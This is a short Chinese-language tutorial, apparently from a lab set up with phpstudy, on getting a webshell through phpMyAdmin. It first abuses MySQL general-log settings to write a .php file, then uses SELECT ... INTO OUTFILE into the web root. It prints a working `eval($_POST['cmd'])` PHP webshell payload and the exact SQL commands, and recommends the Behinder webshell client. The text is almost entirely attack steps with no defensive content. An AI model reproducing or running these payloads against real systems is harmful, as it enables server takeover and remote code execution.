常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码，在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel，这个日志可以在mysql里改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on，以及www下的php文件

然后去select语句

select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

C:\phpstudy_pro\WWW\222.php

3.写入webshell

select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧！